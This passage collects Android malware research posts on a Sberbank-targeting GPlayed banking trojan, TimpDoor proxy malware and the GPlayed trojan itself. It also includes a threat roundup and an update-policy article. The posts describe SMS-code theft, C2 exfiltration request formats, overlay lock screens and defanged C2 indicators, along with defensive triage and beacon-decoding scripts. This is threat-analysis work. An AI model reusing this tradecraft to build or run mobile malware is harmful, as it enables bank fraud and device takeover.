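As an added example (not code from the Talos post), the following Python script performs the kind of static manifest triage an analyst would do before running such a sample: it collects both the <uses-permission> entries and the android:permission guards declared on components (which is where BIND_DEVICE_ADMIN appears, protecting the device-admin receiver) and flags the ones a banking trojan of this kind relies on. The manifest is constructed from the package name and label reported in the post; the receiver class name and the exact permission set are hypothetical.

```python
"""Added example (not from the Talos post): static triage of a decoded AndroidManifest.xml
that lists the requested permissions and flags the ones a banking trojan leans on."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(name):
    """Clark-notation attribute key for android:<name>."""
    return "{%s}%s" % (ANDROID_NS, name)


# Permissions worth a second look and why. BIND_DEVICE_ADMIN, SMS access and the boot receiver
# are the capabilities the post describes; the last two are standard overlay/install gates.
HIGH_RISK = {
    "android.permission.BIND_DEVICE_ADMIN": "device administrator: can lock the screen and resists uninstall",
    "android.permission.RECEIVE_SMS": "reads incoming SMS (validation codes)",
    "android.permission.READ_SMS": "reads stored SMS",
    "android.permission.SEND_SMS": "sends SMS (balance queries, premium numbers)",
    "android.permission.RECEIVE_BOOT_COMPLETED": "restarts on boot",
    "android.permission.SYSTEM_ALERT_WINDOW": "draws overlays on top of other apps",
    "android.permission.REQUEST_INSTALL_PACKAGES": "installs further packages",
}

# Constructed manifest using the package name and label reported in the post;
# the receiver class name and the permission set are hypothetical.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="lola.catgirl">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Play Google Market" android:name="android.app.Application">
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def permissions_in_manifest(xml_text):
    """All permission names: <uses-permission> entries plus android:permission guards on
    components (BIND_DEVICE_ADMIN is declared on the admin receiver, not as uses-permission)."""
    root = ET.fromstring(xml_text)
    names = {el.get(android_attr("name")) for el in root.iter("uses-permission")}
    for component in root.iter():
        guard = component.get(android_attr("permission"))
        if guard:
            names.add(guard)
    return {n for n in names if n}


def triage(xml_text):
    """Summarise identity and risky permissions for an analyst's first look."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    perms = permissions_in_manifest(xml_text)
    return {
        "package": root.get("package"),
        "label": app.get(android_attr("label")) if app is not None else None,
        "device_admin": "android.permission.BIND_DEVICE_ADMIN" in perms,
        "flagged": {p: HIGH_RISK[p] for p in sorted(perms) if p in HIGH_RISK},
    }


if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST)
    print(f"{report['package']} ({report['label']}) device_admin={report['device_admin']}")
    for perm, why in report["flagged"].items():
        print(f"  {perm}: {why}")
```

The mismatch the post points out, a "Play Google Market" label on a package called lola.catgirl that also asks for device-admin and SMS access, is exactly the combination this report surfaces; on a real sample the manifest would first be decoded from the APK's binary XML with a tool such as apktool.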

Trojan details


Once executed, the trojan will start to obtain administrator privileges on the device by requesting that the user change its settings.
Privilege escalation requests

If the user cancels the device administration request, the request dialog reappears every five seconds until the user finally grants administrator privileges. The malware contains code that could lock the device's screen, but it's never called. The same happens with another feature that needs device administrator privileges.
Unused code

Notably, in order to perform its activities as a banking trojan, none of these privileges are needed.

In the next step of its initialization process, the trojan creates a timer with a random value between 900 and 1,800 seconds. When triggered, this timer starts a WebView loaded from the URL hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html. This WebView injects an amount of 500 which, given the victim's profile, it is safe to assume is in rubles.

The overlay will completely cover the screen which, depending on the device, can make the mobile device unusable until reboot or the WebView is closed. The WebView code couldn't be determined because the C2 was never online during the investigation.
WebView blocking device

This WebView overlay technique is the same one used by the GPlayed trojan, from the same family. However, the GPlayed trojan loaded the WebView from local resources contained in the application package. In that case, the WebView would request the user's credit card information to pay for supposed "Google Services." Given the similarities, it is safe to assume that this WebView would have the same sort of objective. The change from hosting the WebView code on the C2 to shipping it as a resource in the package shows that the authors want to remain independent from the C2.

After the malware creates the WebView, it sends an SMS to the Sberbank AutoPay (+79262000900) service with the word "баланс," which means "balance" in Russian. Upon receiving an answer, the trojan will parse it to determine the account balance. If it is lower than 3,000, the trojan won't do anything. If it is larger than 68,000 the trojan requests a value of 66,000, otherwise it will request the available amount minus 1,000.
Balance checking and amount decision

Finally, with the available amount determined, the trojan will create a new WebView object and request the amount defined according to the rules previously shown.

Password extraction code

In order to complete financial transactions, a validation code is necessary. So, the next action is the registration of an SMS handler that parses every arriving SMS message and looks for the word "пароль," which means "password" in Russian. The malware parses the SMS containing that word to extract the password, which is then injected into the previously created WebView. We believe this malware is specifically designed to evade the 3-D Secure anti-fraud mechanism because it injects a variable called "s3dscode" with the extracted value into the WebView object. The password is actually the validation code needed to approve the transaction.
The SMS receiver handler, besides parsing the 3-D Secure validation code, also sends all SMS messages to the C2.
SMS exfiltration code

The SMS messages are exfiltrated using a simple GET request to the REST-based URL hxxp://sub1[.]tdsworker[.]ru:5555/sms/. The format for this request is as follows:

<URL><device id>/<sender address>/<message content>

Trojan activity


This trojan hasn't been observed in the wild yet, and it's not being detected by many antivirus programs at the time of this writing. However, the samples were submitted for detection analysis in nearly the same week as when Talos discovered the malware. Just like in the GPlayed trojan case, the detection ratio was verified the same way: first the package was submitted, followed by the DLL that holds the code. In the case of the DLL, GPlayed and this sample share one of the submission sources, further strengthening the link between the two. Given the architecture, organization and maturity of the code, the most likely relation is that this banking trojan was created from an early version of the GPlayed trojan code base by the same author(s), given that they also share a C2.
Code comparison (above banking trojan, below, the original GPlayed trojan)

Just like GPlayed, the C2 was never online during our research, but it would be easy to adapt this trojan to a new C2. Therefore, we don't know what was displayed in the WebView step mentioned previously. The icon file used by both malware families is the same, which can be considered another link between the packages.

Conclusion


This trojan was designed with a very specific group of victims in mind, namely Sberbank customers who use the AutoPay service. However, adapting it to fit other banks would be a trivial activity for the developers of the GPlayed malware family.

This malware family is just another example of why mobile users need to be critical about the permissions they grant to certain apps. There's no specific exploit that the GPlayed family uses to infect its victims — it can be installed on a device just through a simple spam campaign. Android users need to be aware of two important points: By installing applications from untrusted application stores, they are putting themselves and their data in jeopardy. Also, granting the wrong permissions can make the difference between malware and a legitimate app. Users cannot trust permission justifications, as they are provided by the developer; they must be critical about the permissions and assign them on a case-by-case basis.

The technique of intercepting SMS validation codes is not new for banking trojans. But this banking trojan, followed by the GPlayed trojan, shows a clear evolution of the actors behind these malware families. They went from a simple banking trojan to a full-fledged trojan with capabilities never seen before.

The DLLs used in the malware, which hold the majority of the code, have a low detection ratio and show that anti-virus solutions are not looking at the code in a file and are instead focused on Android packages' permissions and resources. While we have not yet seen these files in the wild, they certainly have the potential to infect a large number of users and could quickly hijack a user's banking credentials.

Coverage


Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs

hxxp://sub1[.]tdsworker[.]ru:5555/sms/
hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html

Hashes

Package.apk - 81d4f6796509a998122817aaa34e1c8c6de738e1fff5146009c07be8493f162c
PlayMarket.dll - 3c82d98f63e5894f53a5d2aa06713e9212269f5f55dcb30d78139ae9da21e212

Mobile Menace Monday: top five scariest mobile threats

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware’s nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights. Afterwards, the ransomware offers a treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla’s tactics of obfuscating malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.

3) Dashing from ghosts? No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It’s one of the most highly detected threats we’ve seen on customers’ Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights. Once given, the user will be doomed with ads on their lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customers’ Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect’s verification system. Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto-install malware like Android/Trojan.Guerrilla and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it’s a preinstalled system app(s). Thus, it cannot be uninstalled through the device’s information page, only disabled. However, the nightmare gets worse—Adups can’t even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you’re going to have to defeat it in a different realm: the realm of ADB command line tools, a part of Google’s Android Studio. Luckily, we found a way to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Google sets Android security updates rules but enforcement is unclear

The vendor requirements for Android are a strange and mysterious thing, but a new leak claims Google has added language to force manufacturers to push more regular Android security updates.

According to The Verge, Google’s latest contract will require OEMs to supply Android security updates for two years and provide at least four updates within the first year of a device’s release. Vendors will also have to release patches within 90 days of Google identifying a vulnerability.

Mandating more consistent Android security updates is certainly a good thing, but it remains unclear what penalties Google would levy against manufacturers that fail to provide the updates or if Google would follow through on any punitive actions.

It has been known for years that Google sets certain rules for manufacturers who want to include the Play Store, Play services and Google apps on Android devices, but because enforcement has been unclear the rules have sometimes been seen as mere suggestions.

For example, Google has had a requirement in place since the spring of 2011 mandating manufacturers to upgrade devices to the latest version of the Android OS released within 18 months of a device’s launch. However, because of the logistics issues of providing those OS updates, Google has rarely been known to enforce that requirement.

This can be seen in the Android OS distribution numbers, which are a complete mess. Currently, according to Google, the most popular version of Android on devices in the wild is Android 6.0 Marshmallow (21.6%), followed by Android 7.0 (19%), Android 5.1 (14.7%), Android 8.0 (13.4%) and Android 7.1 (10.3%). And not even showing up on Google’s numbers because it hasn’t hit the 0.1% threshold for inclusion is Android 9.0 released in August.

Theoretically, the ultimate enforcement of the Android requirements would be Google barring a manufacturer from releasing a device that includes Google apps and services, but there have been no reports of that ever happening. Plus, the European Union’s recent crackdown on Android gives an indication that Google does wield control over the Android ecosystem — and was found to be abusing that power.

The ruling in the EU will allow major OEMs to release forked versions of Android without Google apps and services (something they were previously barred from doing by Google’s contract). It will also force Google to bundle the Play Store, services and most Google apps into a paid licensing bundle, while offering — but not requiring — the Chrome browser and Search as a free bundle. However, early rumors suggest Google might offset the cost of the apps bundle by paying OEMs to use Chrome and Google Search, effectively making it all free and sidestepping any actual change.

These changes only apply to Android devices released in the EU, but it should lead to more devices on the market running Android but featuring third-party apps and services. This could mean some real competition for Google from less popular Android forks such as Amazon’s Fire OS or Xiaomi’s MIUI.

It’s still unknown if the new rules regarding Android security updates are for the U.S. only or if they will be part of contracts in other regions. But, an unintended consequence of the EU rules might be to strengthen Google’s claim that the most secure Android devices are those with the Play Store and Play services.

Google has long leaned on its strong record of keeping malware out of the Play Store and off of user devices, if Play services are installed. Google consistently shows that the highest rates of malware come from sideloading apps in regions where the Play Store and Play services are less common (Russia and China) and where third-party sources are more popular.

Assuming the requirements for Android security updates do apply in other regions around the globe, it might be fair to also assume they’d be tied to the Google apps and services bundle (at least in the EU) because otherwise Google would have no way to put teeth behind the rules. So, not only would Google have its stats regarding how much malware is taken care of in the Play Store and on user devices by Play services, it might also have more stats showing those devices are more consistently updated and patched.

The Play Store, services and Google apps are an enticing carrot to dangle in front of vendors when requiring things like Android security updates, and there is reason to believe manufacturers would be willing to comply in order to get those apps and services, even if the penalties are unclear.

More competition will be coming to the Android ecosystem in the EU, and it’s not unreasonable to think that competition could spread to the U.S., especially if Google is scared to face similar actions by the U.S. government (as unlikely as that may seem). And the less power Google apps and services have in the market, the less force there will be behind any Google requirements for security updates.


The post Google sets Android security updates rules but enforcement is unclear appeared first on Security Bytes.

How to Squash the Android/TimpDoor SMiShing Scam

As technology becomes more advanced, so do cybercriminals’ strategies for gaining access to our personal information. And while phishing scams have been around for over two decades, attackers have adapted their methods to “bait” victims through a variety of platforms. In fact, we’re seeing a rise in the popularity of phishing via SMS messages, or SMiShing. Just recently, the McAfee Mobile Research team discovered active SMiShing campaigns that are tricking users into downloading fake voice-messaging apps, called Android/TimpDoor.

So how does Android/TimpDoor infect a user’s device? When a victim receives the malicious text, the content will include a link. If they click on it, they’ll be directed to a fake web page. The website will then prompt the victim to download the app in order to listen to phony voice messages. Once the app has been downloaded, the malware collects the device information including device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. TimpDoor allows cybercriminals to use the infected device as a digital intermediary without the user’s knowledge. Essentially, it creates a backdoor for hackers to access users’ home networks.

According to our team’s research, these fake apps have infected at least 5,000 devices in the U.S. since the end of March. So, the next question is what can users do to defend themselves from these attacks? Check out the following tips to stay alert and protect yourself from SMS phishing:

  • Do not install apps from unknown sources. If you receive a text asking you to download something onto your phone from a given link, make sure to do your homework. Research the app developer name, product title, download statistics, and app reviews. Be on the lookout for typos and grammatical errors in the description. This is usually a sign that the app is fake.
  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared for TimpDoor or any other threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, as always, to stay up-to-date on the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Squash the Android/TimpDoor SMiShing Scam appeared first on McAfee Blogs.

Android/TimpDoor Turns Mobile Devices Into Hidden Proxies

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel—allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors. McAfee Mobile Security detects this malware as Android/TimpDoor.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Based on our analysis of 26 malicious APK files found on the main distribution server, the earliest TimpDoor variant has been available since March, with the latest APK from the end of August. According to our telemetry data, these apps have infected at least 5,000 devices. The malicious apps have been distributed via an active phishing campaign via SMS in the United States since at least the end of March. McAfee notified the unwitting hosts of the phishing domains and the malware distribution server; at the time of writing this post we have confirmed that they are no longer active.

Campaign targets North America

Since at least the end of March, users in the United States have reported suspicious text messages informing them that they have two voice messages to review and tricking them into clicking a URL to hear them:

Figure 1. User reporting a text that required downloading a fake voice app. Source 800notes.com.

Figure 2. An August 9 text. Source: findwhocallsyou.com.

Figure 3. An August 26 text. Source: 800notes.com.

If the user clicks on one of these links in a mobile device, the browser displays a fake web page that pretends to be from a popular classified advertisement website and asks the user to install an application to listen to the voice messages:

Figure 4. A fake website asking the user to download a voice app.

In addition to the link that provides the malicious APK, the fake site includes detailed instructions on how to disable “Unknown Sources” to install the app that was downloaded outside Google Play.

Fake voice app

When the user clicks on “Download Voice App,” the file VoiceApp.apk is downloaded from a remote server. If the victim follows the instructions, the following screens appear to make the app look legitimate:

Figure 5. Fake voice app initial screens.

The preceding screens are displayed only if the Android version of the infected device is 7.1 or later (API Level 25). If the Android version is earlier, the app skips the initial screens and displays the main fake interface to listen to the “messages”:

Figure 6. The main interface of the fake voice messages app.

Everything on the main screen is fake. The Recents, Saved, and Archive icons have no functionality. The only buttons that work play the fake audio files. The duration of the voice messages does not correspond with the length of the audio files and the phone numbers are fake, present in the resources of the app.

Once the user listens to the fake messages and closes the app, the icon is hidden from the home screen to make it difficult to remove. Meanwhile, it starts a service in the background without the user’s knowledge:

Figure 7. Service running in the background.

Socks proxy over SSH

As soon as the service starts, the malware gathers device information: device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. To gather the public IP address information, TimpDoor uses a free geolocation service to obtain the data (country, region, city, latitude, longitude, public IP address, and ISP) in JSON format. In case the HTTP request fails, the malware makes an HTTP request to the webpage getIP.php of the main control server, which provides the value “public_ip.”

Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID. This port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server. In addition to starting the proxy server through an SSH tunnel, TimpDoor establishes mechanisms to keep the SSH connection alive such as monitoring changes in the network connectivity and setting up an alarm to constantly check the established SSH tunnel:

Figure 8. An execution thread checking changes in connectivity and making sure the SSH tunnel is running.

To ensure the SSH tunnel is up, TimpDoor executes the method updateStatus, which sends the previously collected device information and local/public IP address data to the control server via SSH.

Mobile malware distribution server

By checking the IP address 199.192.19[.]18, which hosted VoiceApp.apk, we found more APK files in the directory US. This likely stands for United States, considering that the fake phone numbers in the voice app are in the country and the messages are sent from US phone numbers:

Figure 9. APK files in the “US” folder of the main malware distribution server.

According to the “Last modified” dates on the server, the oldest APK in the folder is chainmail.apk (March 12) while the newest is VoiceApp.apk (August 27) suggesting the campaign has run for at least five months and is likely still active.

We can divide the APK files into two groups by size (5.1MB and 3.1MB). The main difference between them is that the oldest ones use an HTTP proxy (LittleProxy) while the newest (July and August) use a Socks proxy (MicroSocks), which allows the routing of all traffic for any kind of network protocol (not only HTTP) on any port. Other notable differences are the package name, control server URLs, and the value of appVersion in the updateStatus method—ranging from 1.1.0 to 1.4.0.

In addition to the US folder we also found a CA folder, which could stand for Canada.

Figure 10. The “CA” folder on the distribution server.

Checking the files in the CA folder we found that VoiceApp.apk and relevanbest.apk are the same file with appVersion 1.4.0 (Socks proxy server). Octarineiads.apk is version 1.1.0, with an HTTP proxy.

TimpDoor vs MilkyDoor

TimpDoor is not the first malware that turns Android devices into mobile proxies to forward network traffic from a control server using a Socks proxy through an SSH tunnel. In April 2017 researchers discovered MilkyDoor, an apparent successor of DressCode, which was found a year earlier. Both threats were distributed as Trojanized apps in Google Play. DressCode installs only a Socks proxy server on the infected device; MilkyDoor also protects that connection to bypass network security restrictions using remote port forwarding via SSH, just as TimpDoor does. However, there are some relevant differences between TimpDoor and MilkyDoor:

  • Distribution: Instead of being part of a Trojanized app in Google Play, TimpDoor uses a completely fake voice app distributed via text message
  • SSH connection: While MilkyDoor uploads the device and IP address information to a control server to receive the connection details, TimpDoor already has the information in its code. TimpDoor uses the information to get the remote port to perform dynamic port forwarding and to periodically send updated device data.
  • Pure proxy functionality: MilkyDoor was apparently an adware integrator in early versions of the SDK and later added backdoor functionality. TimpDoor’s sole purpose (at least in this campaign) is to keep the SSH tunnel open and the proxy server running in the background without the user’s consent.

MilkyDoor seems to be a more complete SDK, with adware and downloader functionality. TimpDoor has only basic proxy functionality, first using an HTTP proxy and later Socks.

Conclusion

TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them show that this threat is probably still under development. We expect it will evolve into new variants.

Although this threat has not been seen on Google Play, this SMS phishing campaign distributing TimpDoor shows that cybercriminals are still using traditional phishing techniques to trick users into installing malicious applications.

McAfee Mobile Security detects this threat as Android/TimpDoor. To protect yourselves from this and similar threats, employ security software on your mobile devices and do not install apps from unknown sources.

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

GPlayed Trojan – .Net playing with Google Market

This blog post is authored by Vitor Ventura.

Introduction

In a world where everything is always connected, and mobile devices are involved in individuals' day-to-day lives more and more often, malicious actors are seeing increased opportunities to attack these devices. Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed "GPlayed." This is a trojan with many built-in capabilities. At the same time, it's extremely flexible, making it a very effective tool for malicious actors. The sample we analyzed uses an icon very similar to Google Apps, with the label "Google Play Marketplace" to disguise itself.

The malicious application is on the left-hand side.

What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. Our analysis indicates that this trojan is in its testing stage but given its potential, every mobile user should be aware of GPlayed. Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means. But GPlayed is an example of where this can go wrong, especially if a mobile user is not aware of how to distinguish a fake app versus a real one.

Trojan architecture and capabilities

This malware is written in .NET using the Xamarin environment for mobile applications. The main DLL is called "Reznov.DLL." This DLL contains one root class called "eClient," which is the core of the trojan. The imports reveal the use of a second DLL called "eCommon.dll." We determined that the "eCommon" file contains support code and structures that are platform independent. The main DLL also contains eClient subclasses that implement some of the native capabilities.

The package certificate is issued under the package name, which also resembles the name of the main DLL.

Certificate information

The Android package is named "verReznov.Coampany." The application uses the label "Installer" and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we should highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.

This trojan is highly evolved in its design. It has modular architecture implemented in the form of plugins, or it can receive new .NET source code, which will be compiled on the device in runtime.

Initialization of the compiler object

The plugins can be added in runtime, or they can be added as a package resource at packaging time. This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device.

Trojan native capabilities

This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan. This means that the malware can do anything from harvesting the user's banking credentials to monitoring the device's location. There are several indicators (see section "Trojan activity" below) that it is in its last stages of development, but it has the potential to be a serious threat.

Trojan details

Upon boot, the trojan will start by populating a shared preferences file with the configuration it has on its internal structures. Afterward, it will start several timers to execute different tasks. The first timer will be fired on the configured interval (20 seconds in this case), pinging the command and control (C2) server. The response can either be a simple "OK," or can be a request to perform some action on the device. The second timer will run every five seconds and it will try to enable the WiFi if it's disabled. The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device's status.

During the trojan registration stage, the trojan exfiltrates private information such as the phone's model, IMEI, phone number and country. It will also report the version of Android that the phone is running and any additional capabilities.

Device registration

This is the last of the three main timers that are created. The trojan will register the SMS handler, which will forward the contents and the sender of all of the SMS messages on the phone to the C2.

The final step in the trojan's initialization is the escalation and maintenance of privileges in the device. This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device's settings.

Privilege escalation requests

The screens asking for the user's approval won't close unless the user approves the privilege escalation. If the user closes the windows, they will appear again due to the timer configuration.

After the installation of the trojan, it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called "GoogleCC." This class will open a WebView with a Google-themed page asking for payment in order to use the Google services. This will take the user through several steps until it collects all the necessary credit card information, which will be checked online and exfiltrated to the C2. During this process, an amount of money, configured by the malicious operator, is requested from the user.

Steps to request the user's credit card information

In our sample configuration, the request for the views above cannot be canceled or removed from the screen — behaving just like a screen lock that won't be disabled without providing credit card information.

All communication with the C2 is done over HTTP. The trojan will use a standard web request first and, if that method fails, write the data into a WebSocket; the C2 can therefore use WebSocket as a backup communication channel.

Before sending any data to the C2, the trojan attempts to disguise it: the data is serialized using JSON, which is then encoded in Base64. The trojan then replaces the '=' with 'AAAZZZXXX', the '+' with '|' and the '/' with '.' to disguise the Base64.

Request encoding process

The HTTP requests follow the format below, while on the WebSocket only the query data is written.

<server path>?q=<IMEI>-<REQUEST CODE>:<Obfuscated Base64 encoded data>
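Reading a captured beacon in this format is a routine step when reviewing proxy logs or a traffic capture from a suspect device. The following Python is an added example (not Talos code and not taken from the trojan) that reverses the substitutions and Base64 layer described above and splits the q= value into its parts; the host, IMEI, request code and JSON body in the sample are constructed here.

```python
"""Decoder for the GPlayed beacon format described above.

Added example, not Talos code. The URL layout
    <server path>?q=<IMEI>-<REQUEST CODE>:<obfuscated Base64>
and the substitutions ('=' -> 'AAAZZZXXX', '+' -> '|', '/' -> '.') come
from the write-up; the host, IMEI, request code and JSON body used in the
sample are constructed for illustration.
"""
import base64
import json
from urllib.parse import parse_qs, urlparse

PAD_TOKEN = "AAAZZZXXX"  # stands in for every '=' padding character


def deobfuscate(blob: str) -> bytes:
    """Undo the character substitutions and Base64-decode the payload."""
    # '|' and '.' map one-to-one back to '+' and '/'. (Swapping out '+' also
    # keeps the blob free of a character that query parsers turn into a space.)
    b64 = blob.replace("|", "+").replace(".", "/")
    # Base64 padding can only appear at the end, so restore it from the tail
    # instead of replacing every occurrence: the token is made of ordinary
    # Base64 alphabet characters and could legitimately occur inside data.
    # A payload whose Base64 naturally ends with the token stays ambiguous;
    # on a real dump, check that the decoded bytes parse as JSON.
    pad = 0
    while b64.endswith(PAD_TOKEN):
        b64 = b64[: -len(PAD_TOKEN)]
        pad += 1
    return base64.b64decode(b64 + "=" * pad, validate=True)


def parse_beacon(url: str) -> dict:
    """Split a captured beacon URL into IMEI, request code and decoded JSON."""
    q = parse_qs(urlparse(url).query).get("q")
    if not q:
        raise ValueError("no q= parameter: not a GPlayed beacon")
    ident, sep, blob = q[0].partition(":")
    imei, _, code = ident.partition("-")
    if not (sep and imei.isdigit() and code and blob):
        raise ValueError("q= value does not match <IMEI>-<CODE>:<data>")
    return {"imei": imei, "code": code, "data": json.loads(deobfuscate(blob))}


def obfuscate(payload: dict) -> str:
    """Forward direction, used here only to build the constructed sample."""
    b64 = base64.b64encode(json.dumps(payload).encode()).decode()
    return b64.replace("=", PAD_TOKEN).replace("+", "|").replace("/", ".")


# Constructed sample: placeholder host, a test IMEI and a made-up registration body.
SAMPLE_PAYLOAD = {"model": "Pixel 2", "country": "RU", "android": "8.1"}
SAMPLE_URL = "http://c2.example.invalid/gate?q=356938035643809-1:" + obfuscate(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_URL))
```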

As is common with trojans, the communication is always initiated by the trojan on the device to the C2. The request codes are in fact replies to the C2's action requests, which the trojan calls "responses." There are 27 response codes that the C2 can use to make requests to the trojan, which pretty much match what's listed in the capabilities section.
  • Error
  • Registration
  • Ok
  • Empty
  • SendSMS
  • RequestGoogleCC
  • Wipe
  • OpenBrowser
  • SendUSSD
  • RequestSMSList
  • RequestAppList
  • RequestLocation
  • ShowNotification
  • SetLockPassword
  • LockNow
  • MuteSound
  • LoadScript
  • LoadPlugin
  • ServerChange
  • StartApp
  • CallPhone
  • SetPingTimer
  • SMSBroadcast
  • RequestContacts
  • AddInject
  • RemoveInject
  • Evaluate
Another feature of this trojan is the ability to register injects, which are JavaScript snippets of code. These will be executed in a WebView object created by the trojan. This gives the operators the capability to trick the user into accessing any site while stealing the user's cookies or forging form fields, like account numbers or phone numbers.

Trojan activity

At the time of the writing of this post, all URLs (see IOC section) found on the sample were inactive, and it does not seem to be widespread. There are some indicators that this sample is just a test sample on its final stages of development. There are several strings and labels still mentioning 'test' or 'testcc' — even the URL used for the credit card data exfiltration is named "testcc.php."

Debug information on logcat

Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum.

The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample. We have observed this trojan being submitted to public antivirus testing platforms, once as a package and once for each DLL to determine the detection ratio. The sample analyzed was targeted at Russian-speaking users, as most of the user interaction pages are written in Russian. However, given the way the trojan is built, it is highly customizable, meaning that adapting it to a different language would be extremely easy. The wide range of capabilities doesn't limit this trojan to a specific malicious activity like a banking trojan or a ransomware. This makes it impossible to create a target profile.

Conclusion

